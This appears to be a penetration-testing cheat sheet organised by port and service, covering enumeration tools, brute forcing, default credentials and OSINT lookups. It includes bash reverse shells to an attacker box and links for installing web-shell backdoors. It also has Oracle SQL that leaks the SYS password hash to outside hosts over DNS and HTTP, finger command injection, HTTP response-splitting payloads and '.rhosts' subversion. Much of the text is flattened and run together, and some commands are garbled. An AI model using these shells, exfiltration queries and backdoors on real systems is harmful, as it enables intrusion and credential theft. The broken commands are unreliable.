• Network Footprinting
• Password Cracking
• VoIP Security
• Vulnerability Assessment


• Wireless Penetration
• General Penetration

Discovery & Probing

Enumeration can serve two distinct purposes in an assessment: OS fingerprinting and discovering the remote applications being served.

OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system used on a remote host. It is carried out by analyzing packets received from the host in question. There are two distinct ways to fingerprint an OS: actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS using only the packets it receives and does not require any packets to be sent. Active OS fingerprinting is very noisy: it requires packets to be sent to the remote host and waits for a reply (or lack thereof). Disparate OSs respond differently to certain types of packets (the response is governed by an RFC plus any proprietary responses the vendor, notably Microsoft, has enabled within the system), so custom packets may be sent.

Remote applications being served on a host can be determined by the open ports on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
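For example, an active OS fingerprint with nmap (a hedged sketch; the target address is illustrative):

$ nmap -O -sS -n 192.168.1.10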

Default Port Lists: Windows, *nix

Enumeration tools and techniques: the vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform- and vendor-specific.

General Enumeration Tools

nmap
    nmap -n -A -PN -p- -T Aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
    nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
    nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
    nmap -A -sS -PN -n --script all ip_address --reason
    grep "appears to be up" nmap_saved_filename | awk -F( '{print $2}' | awk -F) '{print $1}' > ip_list
netcat
    nc -v -n IP_Address port
    nc -v -w 2 -z IP_Address port_range/port_number
amap
    amap -bqv 192.168.1.1 80
    amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
xprobe2
    xprobe2 192.168.1.1
sinfp
    ./sinfp.pl -i -p
nbtscan
    nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | ()
hping
    hping ip_address
scanrand
    scanrand ip_address:all
unicornscan
    unicornscan [options 'b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:'] IP_ADDRESS/CIDR_NET_MASK:S-E
netenum
    netenum network/netmask timeout
fping
    fping -a -d hostname/(Network/Subnet_Mask)

Firewall Specific Tools

firewalk
    firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
ftester
    host 1: ./ftestd -i eth0 -v
    host 2: ./ftest -f ftest.conf -v -d 0.01
    then:   ./freport ftest.log ftestd.log

Checklist: Active Hosts, Open TCP Ports, Closed TCP Ports, Open UDP Ports, Closed UDP Ports, Service Probing, SMTP Mail Bouncing, Banner Grabbing, Other HTTP Commands (JUNK / HTTP/1.0, HEAD / HTTP/9.3, OPTIONS / HTTP/1.0, HEAD / HTTP/1.0), Extensions (WebDAV, ASP.NET, Frontpage, OWA, IIS ISAPI, PHP, OpenSSL), HTTPS use to encapsulate traffic.


SMTP POP3 FTP If banner altered, attempt anon logon and execute: ‘quote help’ and ‘syst’ commands. ICMP Responses Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Re- quest) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address Source Port Scans TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos) Firewall Assessment Firewalk TCP/UDP/ICMP responses OS Fingerprint Enumeration FTP port 21 open Fingerprint server telnet ip_address 21 (Banner grab) Run command ftp ip_address [email protected] Check for anonymous access ftp ip_addressUsername: anonymous OR anonPassword: [email protected] Password guessing Hydra brute force medusa Brutus Examine configuration files ftpusers ftp.conf proftpd.conf MiTM pasvagg.pl SSH port 22 open Fingerprint server telnet ip_address 22 (banner grab) scanssh scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask Password guessing ssh root@ip_address guess-who ./b -l username -h ip_address -p 22 -2 < password_file_location Hydra brute force brutessh Ruby SSH Bruteforcer Examine configuration files ssh_config sshd_config authorized_keys ssh_known_hosts .shosts SSH Client programs tunnelier winsshd Telnet port 23 open Fingerprint server telnet ip_address Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/ (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996. IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster telnetfp Password Attack Common passwords Hydra brute force Brutus telnet -l “-froot” hostname (Solaris 10+)


Examine configuration files /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet Sendmail Port 25 open Fingerprint server telnet ip_address 25 (banner grab) Mail Server Testing Enumerate users VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts) Mail Spoof Test HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT Mail Relay Test HELO anything Identical to/from - mail from: rcpt to: Unknown domain - mail from: Do- main not present - mail from: Domain not supplied - mail from: Source address omission - mail from: <> rcpt to: Use IP address of target server - mail from: rcpt to: Use double quotes - mail from: rcpt to: <”user@recipent- domain”> User IP address of the target server - mail from: rcpt to: Disparate formatting - mail from: rcpt to: <@do- main:nobody@recipient-domain> Disparate formatting2 - mail from: rcpt to: Examine Configuration Files sendmail.cf submit.cf DNS port 53 open Fingerprint server/ service host host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename. nslookup nslookup [ -option . . . ] [ host-to-find | - [ server ]] dig dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt. . . ] whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup DNS Enumeration Bile Suite perl BiLE.pl [website] [project_name] perl BiLE-weigh.pl [website] [input file] perl vet-IPrange.pl [input file] [true domain file] [output file] perl vet-mx.pl [in- put file] [true domain file] [output file] perl exp-tld.pl [input file] [output file] perl jarf- dnsbrute [domain_name] (brutelevel) [file_with_names] perl qtrace.pl [ip_address_file] [output_file] perl jarf-rev [subnetblock] [nameserver] txdns txdns -rt -t domain_name txdns -x 50 -bb domain_name txdns –verbose -fm wordlist.dic –server ip_address -rr SOA domain_name -h c: hostlist.txt


Examine Configuration Files host.conf resolv.conf named.conf TFTP port 69 open TFTP Enumeration tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i GET /etc/passwd (old Solaris) TFTP Bruteforcing TFTP bruteforcer Cisco-Torch Finger Port 79 open User enumeration finger ‘a b c d e f g h’ @example.com finger [email protected] finger [email protected] finger [email protected] finger [email protected] finger **@example.com finger [email protected] finger @example.com Command execution finger “|/bin/[email protected]" finger "|/bin/ls -a /@example.com” Finger Bounce finger user@host@victim finger @internal@external Web Ports 80, 8080 etc. open Fingerprint server Telnet ip_address port Firefox plugins All firecat Specific add n edit cookies asnumber header spy live http headers shazou web de- veloper Crawl website lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html Web Directory enumeration Nikto nikto [-h target] [options] DirBuster Wikto Goolag Scanner Vulnerability Assessment Manual Tests Default Passwords Install Backdoors ASP http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt Assorted http://michaeldaw.org/projects/web-backdoor-compilation/ http://open-labs.org/hacker_webkit02.tar.gz Perl http://home.arcor.de/mschierlm/test/pmsh.pl http://pentestmonkey.net/ tools/perl-reverse-shell/ http://freeworld.thc.org/download.php?t=r&f= rwwwshell-2.0.pl.gz PHP http://php.spb.ru/remview/ http://pentestmonkey.net/tools/ php-reverse-shell/ http://pentestmonkey.net/tools/php-findsock-shell/ Python http://matahari.sourceforge.net/ TCL http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_ Cisco_IOS_using_Tcl.pdf&force=yes Bash Connect Back Shell GnuCitizen Atttack Box: nc -l -p Port -vvv Victim: $ exec 5<>/dev/tcp/IP_Address/Port Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done


Neohapsis Atttack Box: nc -l -p Port -vvv Victim: $ exec 0&0 # Next we copy stdin to stdout Victim: $ exec 2>&0 # And finally stdin to stderr Victim: $ exec /bin/sh 0&0 2>&0 Method Testing nc IP_Adress Port HEAD / HTTP/1.0 OPTIONS / HTTP/1.0 PROPFIND / HTTP/1.0 TRACE / HTTP/1.1 PUT http://Target_URL/FILE_NAME POST http: //Target_URL/FILE_NAME HTTP/1.x Upload Files curl curl -u -T file_to_upload curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” put.pl put.pl -h target -r /remote_file_name -f local_file_name webdav cadaver View Page Source Hidden Values Developer Remarks Extraneous Code Passwords! Input Validation Checks NULL or null Possible error messages returned. ‘ , ” , ; , Used to find command execution vulnerabilities. “> Basic Cross-Site Scripting Checks. %0d%0a Carriage Return (%0d) Line Feed (%0a) HTTP Splitting language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47blah Cache Poisoning language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent- Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent- Length:%2047%0d%0a%0d%0aInsert undesireable content here %7f , %ff byte-length overflows; maximum 7- and 8-bit values. -1, other Integer and underflow vulnerabilities. %n , %x , %s Testing for format string vulnerabilities. ../ Directory Traversal Vulnerabilities. % , _, * Wildcard characters can sometimes present DoS issues or information dis- closure. Ax1024+ Overflow vulnerabilities.


Automated table and column iteration orderby.py ./orderby.py www.site.com/index.php?id= d3sqlfuzz.py ./d3sqlfuzz.py www.site.com/index.php?id=- 1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE– Vulnerability Scanners Acunetix Grendelscan NStealth Obiwan III w3af Specific Applications/ Server Tools Domino dominoaudit dominoaudit.pl [options] -h Joomla cms_few ./cms.py joomsq ./joomsq.py joomlascan ./joomlascan.py [options i.e. -p/-proxy : Add proxy support -404 : Don’t show 404 responses] joomscan ./joomscan.py -u “www.site.com/joomladir/” -o site.txt -p 127.0.0.1:80 jscan jscan.pl -f hostname (shell.txt required) aspaudit.pl asp-audit.pl http://target/app/filename.aspx (options i.e. -bf) Vbulletin vbscan.py vbscan.py -v vbscan.py -update ZyXel zyxel-bf.sh snmpwalk snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2 snmpget snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0 Proxy Testing Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab Examine configuration files Generic Examine httpd.conf/ windows config files JBoss JMX Console http://:8080/jmxconcole/ War File Joomla configuration.php diagnostics.php joomla.inc.php config.inc.php Mambo configuration.php config.inc.php Wordpress setup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /Rem- MagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups


/RestoreCfg.html /BackupCfg.html Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings ZyXEL Config Reader Examine web server logs c:winntsystem32LogfilesW3SVC1 awk -F ” ” ‘{print $3,$11} filename | sort | uniq References White Papers Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet Books Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker’s Handbook Exploit Frameworks Brute-force Tools Acunetix Metasploit w3af Portmapper port 111 open rpcdump.py rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP) rpcinfo rpcinfo [options] IP_Address NTP Port 123 open NTP Enumeration ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq host hostname ntpversion readlist version Examine configuration files ntp.conf NetBIOS Ports 135-139,445 open NetBIOS enumeration Enum enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> Null Session net use \192.168.1.1ipc$ “” /u:”“ net view \ip_address Dumpsec Smbclient smbclient -L //server/share password options Superscan Enumeration tab. user2sid/sid2user Winfo NetBIOS brute force Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool) Examine Configuration Files Smb.conf lmhosts SNMP port 161 open Default Community Strings public private cisco cable-docsis ILMI MIB enumeration


Windows NT .1.3.6.1.2.1.1.5 Hostnames .1.3.6.1.4.1.77.1.4.2 Domain Name .1.3.6.1.4.1.77.1.2.25 Usernames .1.3.6.1.4.1.77.1.2.3.1.1 Running Services .1.3.6.1.4.1.77.1.2.27 Share Information Solarwinds MIB walk Getif snmpwalk snmpwalk -v -c Snscan Applications ZyXel snmpget -v2c -c 1.3.6.1.4.1.890.1.2.1.2.6.0 snmpwalk -v2c -c 1.3.6.1.4.1.890.1.2.1.2 SNMP Bruteforce onesixtyone onesixytone -c SNMP.wordlist cat ./cat -h -w SNMP.wordlist Solarwinds SNMP Brute Force ADMsnmp Examine SNMP Configuration files snmp.conf snmpd.conf snmp-config.xml LDAP Port 389 Open ldap enumeration ldapminer ldapminer -h ip_address -p port (not required if default) -d luma Gui based tool ldp Gui based tool openldap ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d de- buglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H lda- puri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [- U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs. . . ] lda- padd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][- y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][- K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][- H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][- n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][- R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][- c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][- x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn] ldap brute force bf_ldap bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l pass- words list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,) K0ldS LDAP_Brute.pl Examine Configuration Files General containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf


IBM SecureWay V3 server V3.sas.oc Microsoft Active Directory server msadClassesAttrs.ldif Netscape Directory Server 4 nsslapd.sas_at.conf nsslapd.sas_oc.conf OpenLDAP directory server slapd.sas_at.conf slapd.sas_oc.conf Sun ONE Directory Server 5.1 75sas.ldif PPTP/L2TP/VPN port 500/1723 open Enumeration ike-scan ike-probe Brute-Force ike-crack Reference Material PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation Modbus port 502 open modscan rlogin port 513 open Rlogin Enumeration Find the files find / -name .rhosts locate .rhosts Examine Files cat .rhosts Manual Login rlogin hostname -l username rlogin Subvert the files echo ++ > .rhosts Rlogin Brute force Hydra rsh port 514 open Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command Rsh Brute Force rsh-grind Hydra medusa SQL Server Port 1433 1434 open SQL Enumeration piggy SQLPing sqlping ip_address/hostname SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver SQL Brute Force SQLPAT sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack SQL Dict SQLAT Hydra SQLlhf ForceSQL Citrix port 1494 open Citrix Enumeration Default Domain Published Applications ./citrix-pa-scan {IP_address/file | - | random} [timeout] citrix-pa-proxy.pl IP_to_proxy_to [Local_IP] Citrix Brute Force bforce.js connect.js Citrix Brute-forcer Reference Material Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way Oracle Port 1521 Open Oracle Enumeration oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration


SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ER- NAME=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E=’SYS’)||’.vulnerabilityassessment.co.uk’) FROM DUAL SQL> select utl_http.request(‘http://gladius:5500/’||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME=’SYS’)) from dual; WinSID Oracle default password list TNSVer tnsver host [port] TCP Scan Oracle TNSLSNR Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop] TNSCmd perl tnscmd.pl -h ip_address perl tnscmd.pl version -h ip_address perl tnscmd.pl status -h ip_address perl tnscmd.pl -h ip_address –cmdsize (40 - 200) LSNrCheck Oracle Security Check (needs credentials) OAT sh opwg.sh -s ip_address opwg.bat -s ip_address sh oquery.sh -s ip_address -u username -p password -d SID OR c:oquery -s ip_address -u username -p pass- word -d SID OScanner sh oscanner.sh -s ip_address oscanner.exe -s ip_address sh reportviewer.sh oscan- ner_saved_file.xml reportviewer.exe oscanner_saved_file.xml NGS Squirrel for Oracle Service Register Service-register.exe ip_address PLSQL Scanner 2008 Oracle Brute Force OAK ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid user- name password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port breakable (Targets Application Server Port) breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose SQLInjector (Targets Application Server Port) sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle Check Password orabf orabf [hash]:[username] [options] thc-orakel Cracker Client Crypto DBVisualisor Sql scripts from pentest.co.uk Manual sql input of previously reported vul- nerabilties Oracle Reference Material Understanding SQL Injection SQL Injection walkthrough SQL In- jection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets


http://ha.ckers.org/sqlinjection http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ http://www.0x000000.com/?i=14 http://pentestmonkey.net/ NFS Port 2049 open NFS Enumeration showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point NFS Brute Force Interact with NFS share and try to add/delete Exploit and Confuse Unix Examine Configuration Files /etc/exports /etc/lib/nfs/xtab Compaq/HP Insight Manager Port 2301,2381open HP Enumeration Authentication Method Host OS Authentication Default Authentication Default Passwords Wikto Nstealth HP Bruteforce Hydra Acunetix Examine Configuration Files path.properties mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc MySQL port 3306 open Enumeration nmap -A -n -p3306 nmap -A -n -PN –script:ALL -p3306 telnet IP_Address 3306 use test; select * from test; To check for other DB’s – show databases Administration MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog Manual Checks Default usernames and passwords username: root password: testing mysql -h -u root mysql -h -u root mysql -h -u root@localhost mysql -h mysql -h -u “”@localhost Configuration Files Operating System windows config.ini my.ini windowsmy.ini winntmy.ini /mysql/data/ unix my.cnf /etc/my.cnf /etc/mysql/my.cnf /var/lib/mysql/my.cnf ~/.my.cnf /etc/my.cnf Command History ~/.mysql.history Log Files connections.log update.log common.log To run many sql commands at once – mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf)


Parent dir = data directory mysql test information_schema (Key information in MySQL) Complete table list – select table_schema,table_name from tables; Exact privileges – select grantee, table_schema, privilege_type FROM schema_privileges; File privileges – select user,file_priv from mysql.user where user=’root’; Version – select version(); Load a specific file – SELECT LOAD_FILE(‘FILENAME’); SSL Check mysql> show variables like ‘have_openssl’; If there’s no rows returned at all it means the the distro itself doesn’t support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn’t started with ssl and can be easily fixed. Privilege Escalation Current Level of access mysql>select user(); mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user=’OUTPUT OF select user()’; Access passwords mysql> use mysql mysql> select user,password from user; Create a new user and grant him privileges mysql>create user test identified by ‘test’; mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on . to mysql identified by ‘mysql’ WITH GRANT OPTION; Break into a shell mysql> ! cat /etc/passwd mysql> ! bash SQL injection mysql-miner.pl mysql-miner.pl http://target/ expected_string database http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html http: //www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/ References. Design Weaknesses MySQL running as root Exposed publicly on Internet http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql http://search.securityfocus.com/ swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0 RDesktop port 3389 open Rdesktop Enumeration Remote Desktop Connection Rdestop Bruteforce TSGrinder tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address Tscrack Sybase Port 5000+ open Sybase Enumeration sybase-version ip_address from NGS Sybase Vulnerability Assessment Use DBVisualiser Sybase Security checksheet Copy output into excel spreadsheet Evaluate mis- configured parameters


Manual sql input of previously reported vulnerabilties Advanced SQL Injection in SQL Server More Advanced SQL Injection NGS Squirrel for Sybase SIP Port 5060 open SIP Enumeration netcat nc IP_Address Port sipflanker python sipflanker.py 192.168.1-254 Sipscan smap smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address SIP Packet Crafting etc. sipsak Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain siprogue SIP Vulnerability Scanning/ Brute Force tftp bruteforcer Default dictionary file ./tftpbrute.pl IP_Address Dictionary_file Maxi- mum_Processes VoIPaudit SiVuS Examine Configuration Files SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf .cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc. VNC port 5900^ open VNC Enumeration Scans 5900^ for direct access.5800 for HTTP access. VNC Brute Force Password Attacks Remote Password Guess vncrack Password Crack vncrack Packet Capture Phosshttp://www.phenoelit.de/phoss Local Registry Locations HKEY_CURRENT_USERSoftwareORLWinVNC3 HKEY_USERS.DEFAULTSoftwareORLWinVNC3 Decryption Key 0x238210763578887 Exmine Configuration Files .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf X11 port 6000^ open X11 Enumeration List open windows Authentication Method Xauth Xhost


X11 Exploitation xwd xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm Keystrokes Received Transmitted Screenshots xhost + Examine Configuration Files /etc/Xn.hosts /usr/lib/X11/xdm Search through all files for the command “xhost +” or “/usr/bin/X11/xhost +” /usr/lib/X11/xdm/xsession /usr/lib/X11/xdm/xsession-remote /usr/lib/X11/xdm/xsession.0 /usr/lib/X11/xdm/xdm-config DisplayManager*authorize:on Port 9001, 9030 open Tor Node Checker Ip Pages Kewlio.net nmap NSE script Jet Direct 9100 open hijetta Network Footprinting Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as pos- sible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack. Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.

Authoratitive Bodies IANA - Internet Assigned Numbers Authority ICANN - Inter- net Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry AFRINIC - African Network Information Centre APNIC - Asia Pa- cific Network Information Centre National Internet Registry APJII CNNIC JPNIC KRNIC TWNIC VNNIC ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre Websites Central Ops Domain Dossier Email Dossier DNS Stuff Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries. Fixed Orbit Autonomous System lookups and other online tools available. Geektools IP2Location Allows limited free IP lookups to be performed, displaying geoloca- tion information, ISP details and other pertinent information.


Kartoo Metasearch engine that visually presents its results. MyIPNeighbors.com Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution Netcraft Online search tool allowing queries for host information. Robtex Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify) Traceroute.org Website listing a large number links to online traceroute re- sources. Wayback Machine Stores older versions of websites, making it a good com- parison tool and excellent resource for previously removed data. Whois.net Tools Cheops-ng Country whois Domain Research Tool Firefox Plugins AS Number Shazou Firecat Suite Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot Internet Search General Information Web Investigator Tracesmart Friends Reunited Ebay - profiles etc. Financial EDGAR - Company information, including real-time filings. US - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK Phone book/ Electoral Role Information 123people http://www.123people.co.uk/s/firstname+lastname/world 192.com Electoral Role Search. UK 411 Online White Pages and Yellow Pages. US Abika Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US BT.com. UK Residential Business Pipl http://pipl.com/search/?FirstName=????&LastName=????&City=&State=&Country=UK&CategoryID=2&Interface=1 http://pipl.com/search/?Email=john%40example.com& CategoryID=4&Interface=1 http://pipl.com/search/ ?Username=????&CategoryID=5&Interface=1 Spokeo http://www.spokeo.com/user?q=domain_name http://www.spokeo. com/user?q=email_address Yasni http://www.yasni.co.uk/index.php?action=search&search=1&sh= &name=firstname+lastname&filter=Keyword Zabasearch People Search Engine. US Generic Web Searching Code Search Forum Entries Database Google


Back end files .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf Email Addresses Contact Details Newsgroups/forums Blog Search Yammer http://blogsearch.google.com/blogsearch?hl=en&ie= UTF-8&q=????&btnG=Search+Blogs Technorati http://technorati.com/search/{[}query]?language=n Present.ly Twitter Network Browser Search Engine Comparison/ Aggregator Sites Clusty http://clusty.com/search?input-form=clusty-simple&v% 3Asources=webplus&query=???? Grokker http://live.grokker.com/grokker.html? query=?????&OpenSearch_Yahoo=true&Wikipedia=true&numResults=250 Zuula http://www.zuula.com/SearchResult.jsp?bst=1&prefpg=1& st=????&x=0&y=0 Exalead http://www.exalead.co.uk/search/results? q=????&x=0&y=0&%24mode=allweb&%24searchlanguages=en Delicious http://delicious.com/search?p=?????&u=&chk=&context=&fr=del_icio_us&lc=0 Metadata Search Metadata can be found within various file formats. Dependant on the file types to be inspected, the more metadata can be extracted. Example metadata that can be extracted includes valid usernames, directory structures etc. make the review of documents/ images etc. relating to the target domain a valuable source of information.

